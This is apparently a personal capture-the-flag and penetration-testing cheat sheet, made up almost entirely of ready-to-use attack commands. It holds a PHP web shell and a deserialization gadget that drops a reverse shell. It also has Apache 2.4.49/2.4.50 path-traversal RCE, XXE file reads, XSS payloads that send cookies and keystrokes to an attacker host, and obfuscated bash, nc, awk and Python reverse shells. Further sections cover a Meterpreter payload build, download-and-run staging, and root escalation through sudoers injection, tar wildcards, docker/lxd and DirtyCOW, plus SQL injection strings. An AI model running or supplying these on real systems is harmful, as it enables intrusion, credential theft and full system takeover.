# Target address reused as $ip by the commands below; set it once per engagement.
ip=10.10.10.10
# Initial service scan: -sC runs the default NSE scripts, -sV probes service versions.
# Unquoted $ip is fine for a bare address; quote it if it ever holds anything else.
nmap -sC -sV $ip
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */onerror=alert('THM') )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert('THM')//>\x3e
# Directory brute force against the target: 20 threads (-t), and for every word also try the .php/.txt/.html variants (-x).
gobuster dir -t 20 -x php,txt,html -w /usr/share/wordlists/dirb/common.txt -u http://$ip/
# Virtual-host brute force: FUZZ is substituted into the Host header; -f saves the results to subdomains.txt.
# --hl 1 hides responses with exactly one line. Calibrate this first against a vhost that certainly does not
# exist: the "unknown host" response size/line count differs per server, so 1 is not a universal baseline.
wfuzz -c -f subdomains.txt -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -u "http://domain.ltd/" -H "Host: FUZZ.domain.ltd" --hl 1
Or with gobuster:
# Same idea with gobuster; keep only hits that answer 200 and print the hostname column of the "Found: host (Status: 200)" lines.
# NOTE(review): gobuster 3.2+ needs --append-domain, otherwise the bare wordlist entry is sent as Host — check `gobuster vhost --help`.
gobuster vhost -u example.com -w /usr/share/amass/wordlists/subdomains.lst | grep "Status: 200" | cut -d " " -f 2
# HTTP POST form brute force against "/": ^USER^/^PASS^ are substituted per attempt; F= is the string that marks a FAILED
# login (a wrong failure string yields false positives — copy it from a real failed response). -I ignores an old restore file.
# Check for account lockout / rate limiting before running this against a client system.
hydra -I -l username -P /usr/share/wordlists/rockyou.txt 10.10.10.10 http-post-form "/:username=^USER^&password=^PASS^:F=bad username"
Shrink the wordlist to 8-character entries (e.g. when the password length is known):
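# Keep only lines that are exactly 8 characters long. grep -E replaces egrep, which newer GNU grep marks obsolete.
grep -E '^.{8}$' /usr/share/wordlists/rockyou.txt > small.txt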
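# WordPress login brute force for the admin user with the reduced list; -V prints every attempt.
# Module is http-post-form (the documented name, matching the hydra line above); S=Location treats a redirect as success.
hydra -l admin -P small.txt "$ip" -V http-post-form '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location'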
# WordPress password attack: every user in username.txt against rockyou with 75 threads (-t).
# Very noisy; against a real site throttle it and enumerate valid users first (wpscan --enumerate u).
wpscan --url http://example.com -P /usr/share/wordlists/rockyou.txt -U username.txt -t 75
php://filter/convert.base64-encode/resource=index.php
Minimal PHP web shell (save as shell.php). It reads cmd from $_REQUEST, so the command can arrive via GET, POST or a cookie:
<?php
// Unauthenticated command backdoor: anyone who can reach this file gets code execution as the
// web-server user. Record where it was dropped and remove it at the end of the engagement.
if (isset($_REQUEST['cmd'])) {
// shell_exec returns the command's stdout only; stderr is not shown unless the caller appends 2>&1.
echo "<pre>" . shell_exec($_REQUEST['cmd']) . "</pre>";
}
?>
PHP insecure deserialization: exploitable when attacker-controlled input reaches unserialize() and a loaded class defines a magic method such as __destruct() that acts on its properties.
<?php
// Gadget for the deserialization issue above. The class name and property names must match the
// target's vulnerable class exactly (FormSubmit / form_file / message here); otherwise PHP builds an
// __PHP_Incomplete_Class and the magic method never runs.
class FormSubmit
{
// File the target's destructor presumably writes $message into — so the payload ends up in shell.php.
public $form_file = 'shell.php';
// Reverse shell to 10.9.58.3:1234. Only stdout is redirected (`>`), so stderr stays on the target;
// use `>&` as the bash one-liners further down do if you want errors back too.
public $message = '<?php exec("/bin/bash -c \'bash -i > /dev/tcp/10.9.58.3/1234 0>&1\'");';
}
// Serialize and URL-encode so the object can be sent in a query string / form field.
print urlencode(serialize(new FormSubmit));
?>
Apache 2.4.49 path traversal (CVE-2021-41773), CGI not enabled — arbitrary file read:
# The %2e in each segment slips past path normalisation, walking out of /cgi-bin/ up to the filesystem root.
curl "http://10.10.138.215:8080//cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/flag.txt"
Apache 2.4.49 with mod_cgi enabled — the same traversal gives RCE by executing /bin/bash:
# The POST body (-d) is what bash executes; echoing a Content-Type header and a blank line first makes the output a valid CGI response.
curl "http://10.10.138.215:8081/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/bash" -d 'echo Content-Type: text/plain; echo; cat /flag.txt' -H "Content-Type: text/plain"
Apache 2.4.50 (incomplete fix, CVE-2021-42013) without CGI — double-encoded dot (%%32%65 → %2e → .):
# Single quotes keep %%32%65 literal; Apache decodes it twice before the traversal check, so it becomes "." on the second pass.
curl 'http://10.10.138.215:8082/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/flag.txt'
Apache 2.4.50 with CGI — RCE with the double-encoded traversal:
# Stages a script from the attacker's web server (10.9.58.3:8000).
# NOTE: wget only DOWNLOADS shell.sh on the target — append `; bash shell.sh` to the -d body (or use curl ... | bash) to actually run it.
curl "http://10.10.138.215:8083/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/bash" -d 'echo Content-Type: text/plain; echo; wget http://10.9.58.3:8000/shell.sh' -H "Content-Type: text/plain"
# XXE injection — the external entity makes the XML parser read a local file and reflect it in the response:
<?xml version="1.0" encoding="UTF-8"?>
<!-- Entity xxe points at /etc/passwd; wherever &xxe; is expanded the file content is inlined.
     Only works if the parser resolves external entities and the app echoes the element back. -->
<!DOCTYPE root [
<!ELEMENT search ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<root>
<name>
hello &xxe;
</name><search>
&xxe;</search></root>
<?xml version="1.0" encoding="UTF-8"?>
<!-- Same XXE, but the php://filter wrapper base64-encodes the PHP source so it comes back as text
     instead of being executed or breaking the XML. Presumably a PHP backend (libxml with PHP stream wrappers). -->
<!DOCTYPE root [
<!ELEMENT search ANY >
<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=/var/www/html/index.php">
]>
<root>
<name>
hello &xxe;
</name><search>
&xxe;</search></root>
# Fetch winPEAS (batch edition) on the attacker box and serve it over HTTP for the Windows target.
# NOTE(review): this is the old repository name (it redirects to PEASS-ng) and the path may have moved;
# prefer a pinned release asset over an unverified file from the master branch.
wget https://raw.githubusercontent.com/carlospolop/privilege-escalation-awesome-scripts-suite/master/winPEAS/winPEASbat/winPEAS.bat
python3 -m http.server
# On the Windows target: pull winPEAS.bat from the attacker's HTTP server (10.9.58.3:8000) into a writable directory and run it.
powershell -c "Invoke-WebRequest -Uri 'http://10.9.58.3:8000/winPEAS.bat' -OutFile 'C:\Windows\Temp\winPEAS.bat'"
cd C:\Windows\Temp\
winPEAS.bat
# Same download for a reverse shell executable (e.g. the msfvenom shell.exe built further down); expect AV to flag it.
powershell -c "Invoke-WebRequest -Uri 'http://10.9.58.3:8000/shell.exe' -OutFile 'C:\Windows\Temp\shell.exe'"
# Local port forward: connections to localhost:6969 on this machine reach port 8080 on the remote host's loopback.
ssh -L 6969:localhost:8080 username@remote.host
# Run on the pivot: listen on 8888 and relay each connection to the pivot's own SSH (22), exposing it on a port that may be reachable from outside.
socat tcp-listen:8888,reuseaddr,fork tcp:localhost:22
Download a static socat onto the target and spawn a fully interactive (pty) reverse shell:
# exec: with pty,sane gives a real TTY straight away (no stty upgrade needed); connects back to 10.9.58.3:4444.
# Catch it with socat on the attacker side, e.g. socat file:$(tty),raw,echo=0 tcp-listen:4444
wget -q http://10.9.58.3:8000/socat -O /tmp/socat; chmod +x /tmp/socat; /tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.9.58.3:4444
Proxy chain (SOCKS over SSH):
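# SOCKS proxy on local port 9050 through the SSH host (-D); -f backgrounds, -N runs no remote command, -q quiet, -C compresses.
ssh -D 9050 -q -C -N -f user@host
# Scan the SSH host's loopback through the proxy. -sT is required: proxychains only hooks connect(), so the
# default raw-socket SYN scan (when running as root) silently bypasses the tunnel; -Pn skips the ping that cannot traverse it either.
# Check /etc/proxychains4.conf: the proxy port must be 9050, and `localnet 127.0.0.0/255.0.0.0` must not be enabled or 127.0.0.1 is never proxied.
proxychains4 nmap -sT -Pn localhost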
List shares on the target (press Enter at the password prompt to try a null session):
# -L lists the shares; the doubled backslashes survive shell processing as \\ip\ .
smbclient -L \\\\$ip\\
Connect to a specific share:
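# Connect to one share as a given user (prompts for the password); reuses $ip from the share listing above. Replace share/username.
smbclient "\\\\$ip\\share" -U username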
# Anonymous FTP check; -i turns off per-file prompting for mget/mput. The three lines below are typed at the ftp> prompt:
ftp -i $ip
# username (any/empty password is normally accepted for anonymous)
anonymous
# byte-exact transfers (never download binaries in ASCII mode)
binary
# active mode — the server connects back to you for data; toggle back to passive if transfers hang through NAT/VPN
passive off
# Start Web Server
# Serves the CURRENT directory on 0.0.0.0:8000 to anyone who can reach it — run it from a folder holding only the payloads you mean to share.
python3 -m http.server
## Inject XSS on the vulnerable web app — redirect-based cookie exfiltration to the server above (the victim sees the redirect, and HttpOnly cookies are not included in document.cookie):
<script>window.location = 'http://10.9.58.3:8000/?param=' + document.cookie </script>
Or:
PoC (proves script execution only):
<script>alert('XSS');</script>
Session stealing (silent fetch; still excludes HttpOnly cookies, and a CSP may block the outbound request):
<script>fetch('https://hacker.thm/steal?cookie=' + btoa(document.cookie));</script>
Key logger (fires one request per keypress — very noisy in server logs):
<script>document.onkeypress = function(e) { fetch('https://hacker.thm/log?key=' + btoa(e.key) );}</script>
Typically the web and SSH ports are open; start by brute-forcing web directories with gobuster (see above).
# Reverse shells — start a listener on the attacker box first (e.g. nc -lvnp 12345 on 10.9.58.3).
# bash: stdin/stdout/stderr all go over the socket (>& redirects both 1 and 2).
bash -i >& /dev/tcp/10.9.58.3/12345 0>&1
# nc without -e: a named pipe carries the listener's input back into /bin/sh (port 1234).
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.9.58.3 1234 >/tmp/f
# Same idea with a less obvious pipe name, removed when the shell exits (port 4444).
mkfifo /tmp/qvfuzlx; nc 10.9.58.3 4444 0</tmp/qvfuzlx | /bin/sh >/tmp/qvfuzlx 2>&1; rm /tmp/qvfuzlx
# 12345
# Base64 of the bash one-liner above (port 12345) for injection points that mangle quotes/redirects.
echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC45LjU4LjMvMTIzNDUgMD4mMQo= | base64 -d | bash
# URL-encoded form of the same one-liner, for a query parameter.
bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F10.9.58.3%2F12345%200%3E%261
# ${IFS} stands in for spaces when they are filtered; -e needs nc.traditional/ncat (the OpenBSD nc has no -e).
nc${IFS}10.9.58.3${IFS}12345${IFS}-e${IFS}/bin/sh
# awk-only reverse shell to port 1234 for hosts without bash/nc; type `exit` at the shell> prompt to close it.
awk 'BEGIN {s = "/inet/tcp/0/10.9.58.3/1234"; while(42) { do{ printf "shell>" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != "exit") close(s); }}' /dev/null
# Python sandbox escape: reaches __import__ through __builtins__ with the names lower()-ed, so
# "import", "os" and "system" never appear literally and slip past simple keyword filters.
__builtins__.__dict__['__IMPORT__'.lower()]('OS'.lower()).__dict__['SYSTEM'.lower()]('/bin/bash')
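# Embed a PHP web shell in an image's EXIF Comment for an upload-filter bypass. The base64 parts decode to the
# GET parameter name ("wreath") and the <pre>/</pre> wrappers, so no obvious strings appear in plaintext.
# exiftool needs the image to write into as its last argument; replace image.jpg with the file you will upload.
exiftool -Comment="<?php \$p0=\$_GET[base64_decode('d3JlYXRo')];if(isset(\$p0)){echo base64_decode('PHByZT4=').shell_exec(\$p0).base64_decode('PC9wcmU+');}die();?>" image.jpg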
# Python reverse shell to 10.9.58.3:12345, base64-wrapped so quotes survive injection. The decoded script is:
# socket connect, dup2 of the socket onto fds 0-2, then subprocess.call("/bin/bash"); the odd spacing is filter padding.
python -c "exec(__import__('base64').b64decode(__import__('codecs').getencoder('utf-8')('aW1wb3J0IHNvY2tldCAgICAgICAsc3VicHJvY2VzcyAgICAgICAsb3MgICAgICA7aG9zdD0iMTAuOS41OC4zIiAgICAgIDtwb3J0PTEyMzQ1ICAgICAgO3M9c29ja2V0LnNvY2tldChzb2NrZXQuQUZfSU5FVCAgICAgICAsc29ja2V0LlNPQ0tfU1RSRUFNKSAgICAgIDtzLmNvbm5lY3QoKGhvc3QgICAgICAgLHBvcnQpKSAgICAgIDtvcy5kdXAyKHMuZmlsZW5vKCkgICAgICAgLDApICAgICAgO29zLmR1cDIocy5maWxlbm8oKSAgICAgICAsMSkgICAgICA7b3MuZHVwMihzLmZpbGVubygpICAgICAgICwyKSAgICAgIDtwPXN1YnByb2Nlc3MuY2FsbCgiL2Jpbi9iYXNoIik=')[0]))"
# Shortest Python shell escape when __import__ itself is not filtered.
__import__('os').system('/bin/bash')
# PYTHONPATH hijack: plant a module in /tmp under the name the sudo'd script imports (assumed to be `module` here)
# so it is loaded first and runs as root.
echo "import os" > /tmp/module.py
echo "os.system('/bin/bash')" >> /tmp/module.py
# NOTE(review): only works if the sudo rule lets PYTHONPATH through (SETENV or env_keep) — check `sudo -l` output for it.
sudo PYTHONPATH=/tmp /usr/bin/python /scripts/Script.py
# Windows x86 staged Meterpreter reverse shell to 10.9.58.3:9001, written as shell.exe (the file fetched on the Windows target above).
# shikata_ga_nai is a classic encoder, not AV evasion — expect modern AV/EDR to flag it; catch the callback with a matching multi/handler.
msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=10.9.58.3 LPORT=9001 -f exe -o shell.exe
# Beacon loop: every 5 s push an interactive bash over a named pipe to 127.0.0.1:9001 — a listener on the SAME host
# (reach it through a port forward). mknod fails harmlessly once the pipe exists; the loop keeps reconnecting after the shell dies.
while true; do sleep 5 && mknod /dev/shm/p p; cat /dev/shm/p | /bin/bash -i | nc 127.0.0.1 9001 >/dev/shm/p; done
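# sudo -l entry for this case (kept as a comment so the notes can be pasted safely):
#   (ALL) /usr/local/bin/less
# Works only if /usr/local/bin/less is a WRITABLE SCRIPT: the appended reverse shell then runs as root on the next
# sudo invocation. If it is the real less binary, break out from inside it instead (GTFOBins-style: sudo /usr/local/bin/less /etc/hosts, then !/bin/sh).
echo 'bash -i >& /dev/tcp/10.9.58.3/12345 0>&1' >> /usr/local/bin/less
sudo /usr/local/bin/less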
PHP payloads (shown as strings — when writing them to a file with echo, use single quotes or a quoted heredoc `cat <<'EOF'`, otherwise the shell expands $_GET/$_POST to nothing):
# Simple GET web shell: /shell.php?cmd=id
"<?php system($_GET['cmd']);?>"
# Reverse shell to 10.9.58.3:12345 (only stdout is redirected; stderr stays on the target).
"<?php exec(\"/bin/bash -c 'bash -i > /dev/tcp/10.9.58.3/12345 0>&1'\"); ?>"
# mkfifo/nc reverse shell to port 1234 for targets where bash's /dev/tcp is unavailable.
<?php exec('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.9.58.3 1234 >/tmp/f') ?>
# Upgrade a dumb reverse shell to a full TTY.
python3 -c 'import pty; pty.spawn("/bin/bash")'
# python2 fallback
python -c 'import pty; pty.spawn("/bin/sh")'
# Press Ctrl-Z first to background the shell, then run this in the LOCAL terminal:
stty raw -echo
# brings the remote shell back with raw mode active (tab completion, Ctrl-C and editors now work)
fg
export TERM=xterm
# msfconsole: needs valid WordPress admin credentials; uploads a malicious plugin and returns a shell.
use exploit/unix/webapp/wp_admin_shell_upload
[More reverse shells](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md#bash-tcp)
# Skip the "is this really WordPress?" fingerprint (useful when the site hides its version) and allow a slow target more time.
set WPCHECK false
set HttpClientTimeout 300
# Crack a passphrase-protected SSH key: convert it to a john hash (on Kali ssh2john.py lives in /usr/share/john), then crack.
ssh2john.py id_rsa > ssh.key
# default john modes, or a straight wordlist run
john ssh.key # or
john ssh.key -w=/usr/share/wordlists/rockyou.txt
Linux /etc/shadow hashes (sha512crypt, $6$ — hashcat mode 1800):
# -a 0 straight dictionary attack; -O uses the optimized kernels (faster, but caps the maximum password length).
hashcat -m 1800 -a0 hash.txt /usr/share/wordlists/rockyou.txt -O
Password-protected zip:
# -D dictionary mode with -p wordlist; -u really unzips to verify each candidate (avoids false positives); -v verbose.
fcrackzip backup.zip -v -u -D -p /usr/share/wordlists/rockyou.txt
# Runs a remote enumeration script straight from the network — plain HTTP, no integrity check, never reviewed.
# On a client system prefer: curl -sL linuxenum.savenas.lt -o linuxenum.sh; read it; bash linuxenum.sh — you are accountable for what executes.
curl linuxenum.savenas.lt -sL | bash
# SUID binaries (mode 04000) — compare the list against GTFOBins.
find / -type f -perm -04000 -ls 2>/dev/null
# Locate the user flag.
find / -type f -name user.txt 2>/dev/null
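# Print every flag*/root/user .txt file. -regex must match the WHOLE path, so the pattern needs a leading `.*/`
# (the original `./` could only ever match a two-character prefix) and `flag.*` (a regex, not a glob).
find / -regextype posix-extended -regex '.*/(flag.*|root|user)\.txt$' -exec cat {} \; 2> /dev/null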
# Private SSH keys left readable on disk.
find / -name id_rsa 2> /dev/null
# Binaries carrying file capabilities (cap_setuid, cap_dac_read_search, ... — see the getcap section below).
getcap -r / 2> /dev/null
# System cron jobs (also look at /etc/cron.d and /var/spool/cron).
cat /etc/crontab
# What the current user may run through sudo.
sudo -l
# CVE-2019-14287: sudo < 1.8.28 treats uid -1 as root, bypassing an "(ALL, !root)" rule.
sudo -u#-1 /bin/bash #if (ALL, !root) NOPASSWD: /bin/bash
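#NFS
# Reach the NFS server through SSH when 2049 is not exposed directly (local 2049 -> remote's 2049).
ssh -fNv -L 2049:localhost:2049 john@10.10.10.1
# Create the mount point before mounting, then enter the share.
mkdir nfs
sudo mount -t nfs localhost:/var/nfs nfs/
cd nfs
# Requires no_root_squash on the export: files written by local root stay root-owned on the server.
# That also means the setuid bit must be set as root — plain chmod on a root-owned file fails with EPERM.
sudo cp /bin/sh .
sudo chmod +s sh
# Then on the NFS host: execute the copy from the export path with -p so the effective uid 0 is kept (verify with id).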
If getcap shows a capability on an interpreter or binary, e.g.:
### python (with cap_setuid, call os.setuid(0) first, as the perl one-liner below does):
python: import os; os.setuid(0); os.system('/bin/sh')   # or non-interactively: output = os.popen('/bin/sh').read()
# perl with cap_setuid: set uid 0 and exec a shell.
perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/sh";'
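# getcap output for this case (kept as a comment): cap_dac_read_search lets tar bypass file read-permission checks.
#   /bin/tar = cap_dac_read_search+ep
# Archive the root-only file with the capable tar, then extract it: the extracted copy is owned by you and readable.
tar -cvf root.tar /root/root.txt
tar -xvf root.tar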
# PATH hijack for a SUID/root process that calls `date` without an absolute path: /tmp/date is found first and execs bash.
echo /bin/bash > /tmp/date && chmod +x /tmp/date
export PATH=/tmp:$PATH
# NOTE(review): nothing above creates /tmp/bash. This last line presumably expects the hijacked program to have
# dropped a setuid bash there (e.g. /tmp/date containing `cp /bin/bash /tmp/bash; chmod +s /tmp/bash`);
# confirm which variant the target needs before relying on it.
/tmp/bash -p
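# tar wildcard injection: a cron job running `tar ... *` in this directory parses these filenames as options and
# executes privesc.sh as root. Replace `user` with your username. The rule is APPENDED to sudoers — overwriting the
# file with `>` discards every existing rule and can leave sudo broken for everyone, including you.
echo 'echo "user ALL=(root) NOPASSWD: ALL" >> /etc/sudoers' > privesc.sh
echo "" > "--checkpoint-action=exec=sh privesc.sh"
echo "" > --checkpoint=1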
Wait up to a minute for the cron job to run tar and execute the script.
Docker (requires access to the docker socket, e.g. membership of the docker group):
# Privileged container with the host's /root/.ssh mounted at /root inside it — read or replace host root's keys.
docker run --privileged -v /root/.ssh/:/root -ti image /bin/bash
Or (mount the whole host filesystem and chroot into it):
# Host / is mounted at /mnt; chroot makes the shell effectively root on the host filesystem. --rm removes the container afterwards.
docker run -v /:/mnt --rm -it alpine chroot /mnt sh
LXC / LXD (requires the user to be in the lxd group):
Import an image (the alpine tarball must first be copied to the target, e.g. one built with lxd-alpine-builder):
lxc image import ./alpine-v3.12-i686-20200831_2036.tar.gz --alias alpine
# security.privileged=true: root inside the container is root on the host, so the mounted disk is fully writable.
lxc init alpine ignite -c security.privileged=true
# Expose the host's / inside the container at /mnt/root.
lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true
lxc start ignite
lxc exec ignite /bin/sh
# Inside the container: the host's /root (flags, .ssh, ...) — changes here land on the host.
cd /mnt/root/root/
If you get the message:
Failed container creation: No storage pool found. Please create a new storage pool.
initialise the storage first with:
# Interactive; creates the missing storage pool. Re-run the lxc init step afterwards.
lxd init
# Kernel/userland exploit suggester piped straight into bash from the master branch — unpinned and unreviewed.
# Download it first (curl -s ... -o les.sh), read it, then run it; treat its output as leads, not proof.
curl https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh -s | bash
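# Build the DirtyCOW (CVE-2016-5195) PoC from the dirtycow/ directory; needs gcc on the target, or build for its architecture elsewhere and copy the binary over.
gcc -pthread dirtycow/c0w.c -o c0w
# Tiny setuid wrapper: once root-owned with the setuid bit it drops into a root shell.
# Headers are included explicitly — GCC 14+ rejects implicit declarations of setgid/setuid/system.
mkdir /tmp/1
printf '%s\n' '#include <stdlib.h>' '#include <unistd.h>' 'int main() { setgid(0); setuid(0); system("/bin/bash"); return 0; }' > /tmp/1/x.c
gcc /tmp/1/x.c -o /tmp/1/x
# NOTE(review): chmod +s only helps once /tmp/1/x is owned by root — presumably c0w is used to gain root
# (or a root process copies the binary) first; as the unprivileged user this merely sets the bit on your own file.
chmod +s /tmp/1/x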
MySQL — UNION-based injection (5 columns; lists the column names of the `users` table):
0 UNION ALL SELECT group_concat(column_name),null,null,null,null FROM information_schema.columns WHERE table_name="users"
Demo on https://sqliteonline.com
List the tables (skipping SQLite's internal sqlite_* tables):
-- sqlite_master holds one row per table/index; the NOT LIKE clause drops SQLite's own bookkeeping tables.
SELECT group_concat(tbl_name) FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%'
# (Windows — misplaced among the SQLite notes.) Prompts for the administrator password, then opens an elevated cmd via UAC (-Verb RunAs).
Start-Process powershell 'Start-Process cmd -Verb RunAs' -Credential administrator
Say the result is `demo`. List its columns (the stored CREATE TABLE statement):
-- sqlite_master.sql is the original CREATE statement, which names every column of the table.
SELECT sql FROM sqlite_master WHERE type!='meta' AND sql NOT NULL AND name ='demo'
') UNION SELECT NULL, NULL, NULL,NULL -- -
or (numbered columns make it obvious which one is reflected in the page):
') union select 1,2,3,4 --
then, through the reflected column, list the tables:
') union select 1,2,3,group_concat(tbl_name) from sqlite_master where type='table' and tbl_name not like 'sqlite_%' --
and then dump the wanted column from `users`:
') union select 1,2,3,group_concat(password) from users --